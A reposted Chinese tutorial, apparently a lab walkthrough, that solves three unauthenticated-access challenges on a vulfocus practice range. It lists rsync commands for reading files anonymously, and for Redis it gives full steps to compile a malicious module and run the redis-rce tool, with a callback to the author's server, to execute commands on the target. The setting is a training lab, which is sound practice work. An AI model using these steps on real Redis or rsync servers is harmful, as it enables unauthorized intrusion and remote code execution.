栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

未授权漏洞vulfocu靶场实战

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

未授权漏洞vulfocu靶场实战

rsync未授权漏洞

打开会有一个输入flag的文本框,所以我们需要查找flag如图

把网站的ip信息收集到如图

在kali终端进入 (rootkali)-[~/vulhub/rsync]目录下输入

rsync rsync://123.58.236.76 :19358/src/

上面也说了flag在tmp目录下所以输入

rsync rsync://123.58.236.76:19358/src/tmp/

可以查到flag 如图

复制到靶场flag位置

可以看到通关

也可到宝塔终端输入相同的命令

效果一样

Redis未授权漏洞(CNVD-2019-21763)

进入宝塔服务器终端执行命令

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand/
make

编译之后继续执行命令

git clone https://github.com/Ridter/redis-rce.git
cd redis-rce/

将RedisModules-ExecuteCommand中的module.so这个文件复制到 同目录下redis-rce

cp module.so ./redis-rce

也可以这样复制

cp ./RedisModules-ExecuteCommand/module.so ./redis-rce

复制过去之后进入redis-rce目录查看到module.so已经复制过去了

安装一个pip 命令为下(前提得有yum) 否则没有python运行脚本

yum -y install python-pip

继续执行。安装一个文本文件

pip install -r requirements.txt

python redis-rce.py -r 123.58.236.76 (靶场ip) -p 40321(靶场端口) -L 121.4.55.89(宝塔服务器端口) -f module.so

宝塔服务器端口放行21000(默认端口)

执行之后

输入ls,直接弹出flag,输入到靶场即可通关

redis 未授权访问 (CNVD-2015-07557)

同上一个redis操作,同理输入代码

python redis-rce.py -r 123.58.236.76  -p 24460 -L 121.4.55.89 -f module.so

flag返回出复制到靶场

成功过关

两个redis操作都一样,改一下端口就OK了

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/751547.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号